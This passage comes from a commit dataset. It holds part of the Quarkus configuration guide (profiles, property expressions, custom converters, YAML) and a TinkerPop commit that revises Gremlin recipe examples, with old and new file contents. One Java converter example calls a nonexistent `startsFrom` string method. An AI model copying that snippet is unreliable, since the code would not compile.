Profiles\n\nQuarkus supports the notion of configuration profiles. These allow you to have multiple configuration in the same file and\nselect between them via a profile name.\n\nThe syntax for this is `%{profile}.config.key=value`. For example if I have the following:\n\n[source,properties]\n----\nquarkus.http.port=9090\n%dev.quarkus.http.port=8181\n----\n\nThe Quarkus HTTP port will be 9090, unless the `dev` profile is active, in which case it will be 8181.\n\nBy default Quarkus has three profiles, although it is possible to use as many as you like. The default profiles are:\n\n* *dev* - Activated when in development mode (i.e. `quarkus:dev`)\n* *test* - Activated when running tests\n* *prod* - The default profile when not running in development or test mode\n\nThere are two ways to set a custom profile, either via the `quarkus.profile` system property or the `QUARKUS_PROFILE`\nenvironment variable. If both are set the system property takes precedence. Note that it is not necessary to\ndefine the names of these profiles anywhere, all that is necessary is to create a config property with the profile\nname, and then set the current profile to that name. For example if I want a `staging` profile with a different HTTP port\nI can add the following to `application.properties`:\n\n[source,properties]\n----\nquarkus.http.port=9090\n%staging.quarkus.http.port=9999\n----\n\nAnd then set the `QUARKUS_PROFILE` environment variable to `staging` to activate my profile.\n\n[NOTE]\n====\nThe proper way to check the active profile programmatically is to use the `getActiveProfile` method of `io.quarkus.runtime.configuration.ProfileManager`.\n\nUsing `@ConfigProperty(\"quarkus.profile\")` will *not* work properly.\n====\n\n=== Using Property Expressions\n\nQuarkus supports the use of property expressions in the `application.properties` file.\n\nThese expressions are resolved when the property is read.\nSo if your configuration property is a build time configuration property, the property expression will be resolved at build time.\nIf your configuration property is overridable at runtime, the property expression will be resolved at runtime.\n\nYou can use property expressions both for the Quarkus configuration or for your own configuration properties.\n\nProperty expressions are defined this way: `${my-property-expression}`.\n\nFor example, having the following property:\n\n[source,properties]\n----\nremote.host=quarkus.io\n----\nand another property defined as:\n\n[source,properties]\n----\ncallable.url=https:\/\/${remote.host}\/\n----\n\nwill result in the value of the `callable.url` property being set to:\n\n[source,properties]\n----\ncallable.url=https:\/\/quarkus.io\/\n----\n\nAnother example would be defining different database servers depending on the profile used:\n\n[source,properties]\n----\n%dev.quarkus.datasource.url=jdbc:mysql:\/\/localhost:3306\/mydatabase?useSSL=false\nquarkus.datasource.url=jdbc:mysql:\/\/remotehost:3306\/mydatabase?useSSL=false\n----\n\ncan be simplified by having:\n\n[source,properties]\n----\n%dev.application.server=localhost\napplication.server=remotehost\n\nquarkus.datasource.url=jdbc:mysql:\/\/${application.server}:3306\/mydatabase?useSSL=false\n----\n\nIt does result in one more line in this example but the value of `application.server` can be reused in other properties,\ndiminishing the possibility of typos and providing more flexibility in property definitions.\n\n=== Combining Property Expressions and Environment Variables\n\nQuarkus also supports the combination of both property expressions and environment variables.\n\nLet's assume you have following property defined in `application.properties`:\n\n[source,properties]\n----\nremote.host=quarkus.io\n----\n\nYou can combine environment variables and property expressions by having a property defined as follows:\n\n[source,properties]\n----\napplication.host=${HOST:${remote.host}}\n----\n\nThis will expand the `HOST` environment variable and use the value of the property `remote.host` as the default value if `HOST` is not set.\n\nFor the purpose of this section we used the property `remote.host` we defined previously.\nIt has to be noted that the value could have been a fixed one such as in:\n\n[source,properties]\n----\napplication.host=${HOST:localhost}\n----\n\nwhich will result in `localhost` as the default value if `HOST` is not set.\n\n=== Clearing properties\n\nRun time properties which are optional, and which have had values set at build time or which have a default value,\nmay be explicitly cleared by assigning an empty string to the property. Note that this will _only_ affect\nrun time properties, and will _only_ work with properties whose values are not required.\n\nThe property may be cleared by setting the corresponding `application.properties` property, setting the\ncorresponding system property, or setting the corresponding environment variable.\n\n==== Miscellaneous\nThe default Quarkus application runtime profile is set to the profile used to build the application.\nFor example:\n[source,shell]\n----\n.\/mvnw package -Pnative -Dquarkus.profile=prod-aws\n.\/target\/my-app-1.0-runner \/\/ <1>\n----\n<1> The command will run with the `prod-aws` profile. This can be overridden using the `quarkus.profile` system property.\n\n== Custom Configuration\n\n=== Custom configuration sources\n\nYou can also introduce custom configuration sources in the standard MicroProfile Config manner. To\ndo this, you must provide a class which implements either `org.eclipse.microprofile.config.spi.ConfigSource`\nor `org.eclipse.microprofile.config.spi.ConfigSourceProvider`. Create a\nhttps:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[service file] for the\nclass and it will be detected and installed at application startup.\n\n=== Custom configuration converters\n\nYou can also use your custom types as a configuration values. This can be done by implementing `org.eclipse.microprofile.config.spi.Converter<T>`\nand adding its fully qualified class name in the `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter` file.\n\nLet us assume you have a custom type like this one:\n\n[source,java]\n----\npackage org.acme.config;\n\npublic class MicroProfileCustomValue {\n\n private final int number;\n\n public MicroProfileCustomValue(int number) {\n this.number = number;\n };\n\n public int getNumber() {\n return number;\n }\n}\n----\n\nThe corresponding converter will look like the one below. Please note that your custom converter class must be `public` and must have\na `public` no-argument constructor. It also must not be `abstract`.\n\n\n[source,java]\n----\npackage org.acme.config;\n\nimport org.eclipse.microprofile.config.spi.Converter;\n\npublic class MicroProfileCustomValueConverter implements Converter<MicroProfileCustomValue> {\n\n @Override\n public MicroProfileCustomValue convert(String value) {\n return new MicroProfileCustomValue(Integer.valueOf(value));\n }\n}\n----\n\nThen you need to include the fully qualified class name of the converter in a service file `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter`.\nIf you have more converters, simply add their class names in this file as well. Single fully qualified class name per line, for example:\n\n[source]\n----\norg.acme.config.MicroProfileCustomValueConverter\norg.acme.config.SomeOtherConverter\norg.acme.config.YetAnotherConverter\n----\n\nPlease note that `SomeOtherConverter` and `YetAnotherConverter` were added just for a demonstration. If you include in this file classes\nwhich are not available at runtime, the converters loading will fail.\n\nAfter this is done you can use your custom type as a configuration value:\n\n[source,java]\n----\n@ConfigProperty(name = \"configuration.value.name\")\nMicroProfileCustomValue value;\n----\n\n==== Converter priority\n\nIn some cases, you may want to use a custom converter to convert a type which is already converted\nby a different converter. In such cases, you can use the `javax.annotation.Priority` annotation to\nchange converters precedence and make your custom converter of higher priority than the other\non the list.\n\nBy default, if no `@Priority` can be found on a converter, it's registered with a priority of 100\nand all Quarkus core converters are registered with a priority of 200, so depending on which\nconverter you would like to replace, you need to set a higher value.\n\nTo demonstrate the idea let us implement a custom converter which will take precedence over\n`MicroProfileCustomValueConverter` implemented in the previous example.\n\n[source,java]\n----\npackage org.acme.config;\n\nimport javax.annotation.Priority;\nimport org.eclipse.microprofile.config.spi.Converter;\n\n@Priority(150)\npublic class MyCustomConverter implements Converter<MicroProfileCustomValue> {\n\n @Override\n public MicroProfileCustomValue convert(String value) {\n\n final int secretNumber;\n if (value.startsFrom(\"OBF:\")) {\n secretNumber = Integer.valueOf(SecretDecoder.decode(value));\n } else {\n secretNumber = Integer.valueOf(value);\n }\n\n return new MicroProfileCustomValue(secretNumber);\n }\n}\n----\n\nSince it converts the same value type (namely `MicroProfileCustomValue`) and has a priority\nof 150, it will be used instead of a `MicroProfileCustomValueConverter` which has a default\npriority of 100.\n\nNOTE: This new converter also needs to be listed in a service file, i.e. `META-INF\/services\/org.eclipse.microprofile.config.spi.Converter`.\n\n[[yaml]]\n== YAML for Configuration\n\n=== Add YAML Config Support\n\nYou might want to use YAML over properties for configuration.\nSince link:https:\/\/github.com\/smallrye\/smallrye-config[SmallRye Config] brings support for YAML\nconfiguration, Quarkus supports this as well.\n\nFirst you will need to add the YAML extension to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-config-yaml<\/artifactId>\n<\/dependency>\n----\n\nOr you can alternatively run this command in the directory containing your Quarkus project:\n\n[source,bash]\n----\n.\/mvnw quarkus:add-extension -Dextensions=\"config-yaml\"\n----\n\nNow Quarkus can read YAML configuration files.\nThe config directories and priorities are the same as before.\n\nNOTE: Quarkus will choose an `application.yaml` over an `application.properties`.\nYAML files are just an alternative way to configure your application.\nYou should decide and keep one configuration type to avoid errors.\n\n==== Configuration Examples\n[source,yaml]\n----\n# YAML supports comments\nquarkus:\n datasource:\n url: jdbc:postgresql:\/\/localhost:5432\/some-database\n driver: org.postgresql.Driver\n username: quarkus\n password: quarkus\n\n# REST Client configuration property\norg:\n acme:\n restclient:\n CountriesService\/mp-rest\/url: https:\/\/restcountries.eu\/rest\n\n# For configuration property names that use quotes, do not split the string inside the quotes.\nquarkus:\n log:\n category:\n \"io.quarkus.category\":\n level: INFO\n----\n\n[NOTE]\n====\nQuarkus also supports using `application.yml` as the name of the YAML file. The same rules apply for this file as for `application.yaml`.\n====\n\n=== Profile dependent configuration\n\nProviding profile dependent configuration with YAML is done like with properties.\nJust add the `%profile` wrapped in quotation marks before defining the key-value pairs:\n\n[source,yaml]\n----\n\"%dev\":\n quarkus:\n datasource:\n url: jdbc:postgresql:\/\/localhost:5432\/some-database\n driver: org.postgresql.Driver\n username: quarkus\n password: quarkus\n----\n\n=== Configuration key conflicts\n\nThe MicroProfile Configuration specification defines configuration keys as an arbitrary `.`-delimited string.\nHowever, structured formats like YAML naively only support a subset of the possible configuration namespace.\nFor example, consider the two configuration properties `quarkus.http.cors` and `quarkus.http.cors.methods`.\nOne property is the prefix of another, so it may not be immediately evident how to specify both keys in your YAML configuration.\n\nThis is solved by using a null key (normally represented by `~`) for any YAML property which is a prefix of another one. Here's an example:\n\n.An example YAML configuration resolving prefix-related key name conflicts\n[source,yaml]\n----\nquarkus:\n http:\n cors:\n ~: true\n methods: GET,PUT,POST\n----\n\nIn general, null YAML keys are not included in assembly of the configuration property name, allowing them to be used to\nany level for disambiguating configuration keys.\n\n== More info on how to configure\n\nQuarkus relies on SmallRye Config and inherits its features.\n\nSmallRye Config provides:\n\n* Additional Config Sources\n* Additional Converters\n* Interceptors for configuration value resolution\n* Relocate Configuration Properties\n* Fallback Configuration Properties\n* Logging\n* Hide Secrets\n\nFor more information, please check the\nlink:https:\/\/smallrye.io\/docs\/smallrye-config\/index.html[SmallRye Config documentation].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9cdc47c3876ab3326de096a66228ccd43d8a42ca","subject":"optimized math examples","message":"optimized math examples\n","repos":"krlohnes\/tinkerpop,apache\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,jorgebay\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop","old_file":"docs\/src\/recipes\/appendix.asciidoc","new_file":"docs\/src\/recipes\/appendix.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nAppendix\n========\n\nMany of the recipes are based on questions and answers provided on the\nlink:https:\/\/groups.google.com\/forum\/#!forum\/gremlin-users[gremlin-users mailing list] or on\nlink:http:\/\/stackoverflow.com\/questions\/tagged\/gremlin[StackOverflow]. This section contains those traversals from\nthose sources that do not easily fit any particular pattern (i.e. a recipe), but are nonetheless interesting and thus\nremain good tools for learning Gremlin.\n\n[[appendix-a]]\n_For each person in a \"follows\" graph, determine the number of followers and list their names._\n\n[gremlin-groovy]\n----\ng.addV('name','marko').as('marko').\n addV('name','josh').as('josh').\n addV('name','daniel').as('daniel').\n addV('name','matthias').as('matthias').\n addE('follows').from('josh').to('marko').\n addE('follows').from('matthias').to('josh').\n addE('follows').from('daniel').to('josh').\n addE('follows').from('daniel').to('marko').iterate()\ng.V().as('p').\n map(__.in('follows').values('name').fold()).\n project('person','followers','numFollowers').\n by(select('p').by('name')).\n by().\n by(count(local))\n----\n\nIt might also be alternatively written as:\n\n[gremlin-groovy,existing]\n----\ng.V().group().\n by('name').\n by(project('numFollowers','followers').\n by(__.in('follows').count()).\n by(__.in('follows').values('name').fold())).next()\n----\n\nor even:\n\n[gremlin-groovy,existing]\n----\ng.V().group().\n by('name').\n by(__.in('follows').values('name').fold().\n project('numFollowers','followers').\n by(count(local)).\n by()).next()\n----\n\n[[appendix-b]]\n_In the \"modern\" graph, show each person, the software they worked on and the co-worker count for the software and\nthe names of those co-workers._\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel(\"person\").as(\"p\").\n out(\"created\").as(\"s\").\n map(__.in(\"created\").\n where(neq(\"p\")).values(\"name\").fold()).\n group().by(select(\"p\").by(\"name\")).\n by(group().by(select(\"s\").by(\"name\")).\n by(project(\"numCoworkers\",\"coworkers\").\n by(count(local)).by())).next()\n----\n\n[[appendix-c]]\n_Assuming a graph of students, classes and times, detect students who have a conflicting schedule._\n\n[gremlin-groovy]\n----\ng.addV(label, \"student\", \"name\", \"Pete\").as(\"s1\").\n addV(label, \"student\", \"name\", \"Joe\").as(\"s2\").\n addV(label, \"class\", \"name\", \"Java's GC\").as(\"c1\").\n addV(label, \"class\", \"name\", \"FP Principles\").as(\"c2\").\n addV(label, \"class\", \"name\", \"Memory Management in C\").as(\"c3\").\n addV(label, \"class\", \"name\", \"Memory Management in C++\").as(\"c4\").\n addV(label, \"timeslot\", \"date\", \"11\/25\/2016\", \"fromTime\", \"10:00\", \"toTime\", \"11:00\").as(\"t1\").\n addV(label, \"timeslot\", \"date\", \"11\/25\/2016\", \"fromTime\", \"11:00\", \"toTime\", \"12:00\").as(\"t2\").\n addE(\"attends\").from(\"s1\").to(\"c1\").\n addE(\"attends\").from(\"s1\").to(\"c2\").\n addE(\"attends\").from(\"s1\").to(\"c3\").\n addE(\"attends\").from(\"s1\").to(\"c4\").\n addE(\"attends\").from(\"s2\").to(\"c2\").\n addE(\"attends\").from(\"s2\").to(\"c3\").\n addE(\"allocated\").from(\"c1\").to(\"t1\").\n addE(\"allocated\").from(\"c1\").to(\"t2\").\n addE(\"allocated\").from(\"c2\").to(\"t1\").\n addE(\"allocated\").from(\"c3\").to(\"t2\").\n addE(\"allocated\").from(\"c4\").to(\"t2\").iterate()\ng.V().hasLabel(\"student\").as(\"s\").\n out(\"attends\").as(\"c\").\n out(\"allocated\").as(\"t\").\n select(\"s\").\n out(\"attends\").\n where(neq(\"c\")).\n out(\"allocated\").\n where(eq(\"t\")).\n group().\n by(select(\"s\").by(\"name\")).\n by(group().by(select(\"t\").by(valueMap(\"fromTime\",\"toTime\"))).\n by(select(\"c\").dedup().values(\"name\").fold())).next()\n----\n\n[[appendix-d]]\n_In the \"modern\" graph, with a duplicate edge added, find the vertex pairs that have more than one edge between them._\n\n[gremlin-groovy,modern]\n----\ng.V(1).as(\"a\").V(3).addE(\"created\").property(\"weight\",0.4d).from(\"a\").iterate()\ng.V(1).outE(\"created\")\ng.V().as(\"a\").\n out().as(\"b\").\n groupCount().\n by(select(\"a\",\"b\")).\n unfold().\n filter(select(values).is(gt(1))).\n select(keys)\n----\n\nThe following example assumes that the edges point in the `OUT` direction. Assuming undirected edges:\n\n[gremlin-groovy,modern]\n----\ng.V().where(without(\"x\")).as(\"a\").\n outE().as(\"e\").inV().as(\"b\").\n filter(bothE().where(neq(\"e\")).otherV().where(eq(\"a\"))).store(\"x\").\n select(\"a\",\"b\").dedup()\n----\n\n[[appendix-e]]\n_In the \"crew\" graph, find vertices that match on a complete set of multi-properties._\n\n[gremlin-groovy,theCrew]\n----\nplaces = [\"centreville\",\"dulles\"];[] \/\/ will not match as \"purcellville\" is missing\ng.V().not(has(\"location\", without(places))).\n where(values(\"location\").is(within(places)).count().is(places.size())).\n valueMap()\nplaces = [\"centreville\",\"dulles\",\"purcellville\"];[]\ng.V().not(has(\"location\", without(places))).\n where(values(\"location\").is(within(places)).count().is(places.size())).\n valueMap()\n----\n\n[[appendix-f]]\n_Methods for performing some basic mathematical operations in the \"modern\" graph._\n\n[gremlin-groovy,modern]\n----\ng.V().values(\"age\").sum() \/\/ sum all ages\ng.V().values(\"age\").fold(1, mult) \/\/ multiply all ages\ng.withSack(0).V().values(\"age\").sack(sum).sack(sum).by(constant(-1)).sack() \/\/ subtract 1\ng.withSack(0).V().values(\"age\").sack(sum).sack(sum).sack() \/\/ multiply by 2 (simple)\ng.withSack(0).V().values(\"age\").sack(sum).sack(mult).by(constant(2)).sack() \/\/ multiply by 2 (generally useful for multiplications by n)\n----\n\n[[appendix-g]]\n_Dropping a vertex, as well as the vertices related to that dropped vertex that are connected by a \"knows\" edge in the\n\"modern\" graph_\n\n[gremlin-groovy,modern]\n----\ng.V().has('name','marko').outE()\ng.V().has('name','marko').sideEffect(out('knows').drop()).drop()\ng.V().has('name','marko')\ng.V(2,4,3)\n----\n\n[[appendix-h]]\n_For the specified graph, find all neighbor vertices connected to \"A\" as filtered by datetime, those neighbor vertices\nthat don't have datetime vertices, and those neighbor vertices that have the label \"dimon\"._\n\n[gremlin-groovy]\n----\ng.addV().property(\"name\", \"A\").as(\"a\").\n addV().property(\"name\", \"B\").as(\"b\").\n addV().property(\"name\", \"C\").as(\"c\").\n addV().property(\"name\", \"D\").as(\"d\").\n addV().property(\"name\", \"E\").as(\"e\").\n addV(\"dimon\").property(\"name\", \"F\").as(\"f\").\n addV().property(\"name\", \"G\").as(\"g\").property(\"date\", 20160818).\n addV().property(\"name\", \"H\").as(\"h\").property(\"date\", 20160817).\n addE(\"rel\").from(\"a\").to(\"b\").\n addE(\"rel\").from(\"a\").to(\"c\").\n addE(\"rel\").from(\"a\").to(\"d\").\n addE(\"rel\").from(\"a\").to(\"e\").\n addE(\"rel\").from(\"c\").to(\"f\").\n addE(\"occured_at\").from(\"d\").to(\"g\").\n addE(\"occured_at\").from(\"e\").to(\"h\").iterate()\n\/\/ D and E have a valid datetime\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", gte(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ only E has a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", lte(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ only D has a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", gt(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ neither D nor E have a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", lt(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n----\n\n[[appendix-i]]\n_Use element labels in a `select`._\n\n[gremlin-groovy,modern]\n----\ng.V(1).as(\"a\").\n both().\n map(group().by(label).by(unfold())).as(\"b\").\n select(\"a\",\"b\").\n map(union(project(\"a\").by(select(\"a\")), select(\"b\")).\n unfold().\n group().\n by(select(keys)).\n by(select(values)))\ng.V().as(\"a\").\n both().\n map(group().by(label).by(unfold())).as(\"b\").\n select(\"a\",\"b\").\n group().\n by(select(\"a\")).\n by(select(\"b\").\n group().\n by(select(keys)).\n by(select(values).fold())).\n unfold().\n map(union(select(keys).project(\"a\").by(), select(values)).\n unfold().\n group().\n by(select(keys).unfold()).\n by(select(values).unfold().unfold().fold()))\n----\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\nAppendix\n========\n\nMany of the recipes are based on questions and answers provided on the\nlink:https:\/\/groups.google.com\/forum\/#!forum\/gremlin-users[gremlin-users mailing list] or on\nlink:http:\/\/stackoverflow.com\/questions\/tagged\/gremlin[StackOverflow]. This section contains those traversals from\nthose sources that do not easily fit any particular pattern (i.e. a recipe), but are nonetheless interesting and thus\nremain good tools for learning Gremlin.\n\n[[appendix-a]]\n_For each person in a \"follows\" graph, determine the number of followers and list their names._\n\n[gremlin-groovy]\n----\ng.addV('name','marko').as('marko').\n addV('name','josh').as('josh').\n addV('name','daniel').as('daniel').\n addV('name','matthias').as('matthias').\n addE('follows').from('josh').to('marko').\n addE('follows').from('matthias').to('josh').\n addE('follows').from('daniel').to('josh').\n addE('follows').from('daniel').to('marko').iterate()\ng.V().as('p').\n map(__.in('follows').values('name').fold()).\n project('person','followers','numFollowers').\n by(select('p').by('name')).\n by().\n by(count(local))\n----\n\nIt might also be alternatively written as:\n\n[gremlin-groovy,existing]\n----\ng.V().group().\n by('name').\n by(project('numFollowers','followers').\n by(__.in('follows').count()).\n by(__.in('follows').values('name').fold())).next()\n----\n\nor even:\n\n[gremlin-groovy,existing]\n----\ng.V().group().\n by('name').\n by(__.in('follows').values('name').fold().\n project('numFollowers','followers').\n by(count(local)).\n by()).next()\n----\n\n[[appendix-b]]\n_In the \"modern\" graph, show each person, the software they worked on and the co-worker count for the software and\nthe names of those co-workers._\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel(\"person\").as(\"p\").\n out(\"created\").as(\"s\").\n map(__.in(\"created\").\n where(neq(\"p\")).values(\"name\").fold()).\n group().by(select(\"p\").by(\"name\")).\n by(group().by(select(\"s\").by(\"name\")).\n by(project(\"numCoworkers\",\"coworkers\").\n by(count(local)).by())).next()\n----\n\n[[appendix-c]]\n_Assuming a graph of students, classes and times, detect students who have a conflicting schedule._\n\n[gremlin-groovy]\n----\ng.addV(label, \"student\", \"name\", \"Pete\").as(\"s1\").\n addV(label, \"student\", \"name\", \"Joe\").as(\"s2\").\n addV(label, \"class\", \"name\", \"Java's GC\").as(\"c1\").\n addV(label, \"class\", \"name\", \"FP Principles\").as(\"c2\").\n addV(label, \"class\", \"name\", \"Memory Management in C\").as(\"c3\").\n addV(label, \"class\", \"name\", \"Memory Management in C++\").as(\"c4\").\n addV(label, \"timeslot\", \"date\", \"11\/25\/2016\", \"fromTime\", \"10:00\", \"toTime\", \"11:00\").as(\"t1\").\n addV(label, \"timeslot\", \"date\", \"11\/25\/2016\", \"fromTime\", \"11:00\", \"toTime\", \"12:00\").as(\"t2\").\n addE(\"attends\").from(\"s1\").to(\"c1\").\n addE(\"attends\").from(\"s1\").to(\"c2\").\n addE(\"attends\").from(\"s1\").to(\"c3\").\n addE(\"attends\").from(\"s1\").to(\"c4\").\n addE(\"attends\").from(\"s2\").to(\"c2\").\n addE(\"attends\").from(\"s2\").to(\"c3\").\n addE(\"allocated\").from(\"c1\").to(\"t1\").\n addE(\"allocated\").from(\"c1\").to(\"t2\").\n addE(\"allocated\").from(\"c2\").to(\"t1\").\n addE(\"allocated\").from(\"c3\").to(\"t2\").\n addE(\"allocated\").from(\"c4\").to(\"t2\").iterate()\ng.V().hasLabel(\"student\").as(\"s\").\n out(\"attends\").as(\"c\").\n out(\"allocated\").as(\"t\").\n select(\"s\").\n out(\"attends\").\n where(neq(\"c\")).\n out(\"allocated\").\n where(eq(\"t\")).\n group().\n by(select(\"s\").by(\"name\")).\n by(group().by(select(\"t\").by(valueMap(\"fromTime\",\"toTime\"))).\n by(select(\"c\").dedup().values(\"name\").fold())).next()\n----\n\n[[appendix-d]]\n_In the \"modern\" graph, with a duplicate edge added, find the vertex pairs that have more than one edge between them._\n\n[gremlin-groovy,modern]\n----\ng.V(1).as(\"a\").V(3).addE(\"created\").property(\"weight\",0.4d).from(\"a\").iterate()\ng.V(1).outE(\"created\")\ng.V().as(\"a\").\n out().as(\"b\").\n groupCount().\n by(select(\"a\",\"b\")).\n unfold().\n filter(select(values).is(gt(1))).\n select(keys)\n----\n\nThe following example assumes that the edges point in the `OUT` direction. Assuming undirected edges:\n\n[gremlin-groovy,modern]\n----\ng.V().where(without(\"x\")).as(\"a\").\n outE().as(\"e\").inV().as(\"b\").\n filter(bothE().where(neq(\"e\")).otherV().where(eq(\"a\"))).store(\"x\").\n select(\"a\",\"b\").dedup()\n----\n\n[[appendix-e]]\n_In the \"crew\" graph, find vertices that match on a complete set of multi-properties._\n\n[gremlin-groovy,theCrew]\n----\nplaces = [\"centreville\",\"dulles\"];[] \/\/ will not match as \"purcellville\" is missing\ng.V().not(has(\"location\", without(places))).\n where(values(\"location\").is(within(places)).count().is(places.size())).\n valueMap()\nplaces = [\"centreville\",\"dulles\",\"purcellville\"];[]\ng.V().not(has(\"location\", without(places))).\n where(values(\"location\").is(within(places)).count().is(places.size())).\n valueMap()\n----\n\n[[appendix-f]]\n_Methods for performing some basic mathematical operations in the \"modern\" graph._\n\n[gremlin-groovy,modern]\n----\ng.V().values(\"age\").sum() \/\/ sum all ages\ng.V().values(\"age\").fold(1, mult) \/\/ multiply all ages\ng.V().values(\"age\").map(union(identity(), constant(-1)).sum()) \/\/ subtract 1\ng.V().values(\"age\").map(union(identity(), identity()).sum()) \/\/ multiply by 2 (simple)\ng.V().values(\"age\").map(union(identity(), constant(2)).fold(1, mult)) \/\/ multiply by 2 (generally useful for multiplications by n):\n----\n\n[[appendix-g]]\n_Dropping a vertex, as well as the vertices related to that dropped vertex that are connected by a \"knows\" edge in the\n\"modern\" graph_\n\n[gremlin-groovy,modern]\n----\ng.V().has('name','marko').outE()\ng.V().has('name','marko').sideEffect(out('knows').drop()).drop()\ng.V().has('name','marko')\ng.V(2,4,3)\n----\n\n[[appendix-h]]\n_For the specified graph, find all neighbor vertices connected to \"A\" as filtered by datetime, those neighbor vertices\nthat don't have datetime vertices, and those neighbor vertices that have the label \"dimon\"._\n\n[gremlin-groovy]\n----\ng.addV().property(\"name\", \"A\").as(\"a\").\n addV().property(\"name\", \"B\").as(\"b\").\n addV().property(\"name\", \"C\").as(\"c\").\n addV().property(\"name\", \"D\").as(\"d\").\n addV().property(\"name\", \"E\").as(\"e\").\n addV(\"dimon\").property(\"name\", \"F\").as(\"f\").\n addV().property(\"name\", \"G\").as(\"g\").property(\"date\", 20160818).\n addV().property(\"name\", \"H\").as(\"h\").property(\"date\", 20160817).\n addE(\"rel\").from(\"a\").to(\"b\").\n addE(\"rel\").from(\"a\").to(\"c\").\n addE(\"rel\").from(\"a\").to(\"d\").\n addE(\"rel\").from(\"a\").to(\"e\").\n addE(\"rel\").from(\"c\").to(\"f\").\n addE(\"occured_at\").from(\"d\").to(\"g\").\n addE(\"occured_at\").from(\"e\").to(\"h\").iterate()\n\/\/ D and E have a valid datetime\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", gte(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ only E has a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", lte(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ only D has a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", gt(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n\/\/ neither D nor E have a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n union(where(out(\"occured_at\").has(\"date\", lt(20160817))),\n __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n valueMap()\n----\n\n[[appendix-i]]\n_Use element labels in a `select`._\n\n[gremlin-groovy,modern]\n----\ng.V(1).as(\"a\").\n both().\n map(group().by(label).by(unfold())).as(\"b\").\n select(\"a\",\"b\").\n map(union(project(\"a\").by(select(\"a\")), select(\"b\")).\n unfold().\n group().\n by(select(keys)).\n by(select(values)))\ng.V().as(\"a\").\n both().\n map(group().by(label).by(unfold())).as(\"b\").\n select(\"a\",\"b\").\n group().\n by(select(\"a\")).\n by(select(\"b\").\n group().\n by(select(keys)).\n by(select(values).fold())).\n unfold().\n map(union(select(keys).project(\"a\").by(), select(values)).\n unfold().\n group().\n by(select(keys).unfold()).\n by(select(values).unfold().unfold().fold()))\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db90f78abc3598fb799cee7b93afb80ea11aecb8","subject":"Change the way the Cassandra location is provided.","message":"Change the way the Cassandra location is 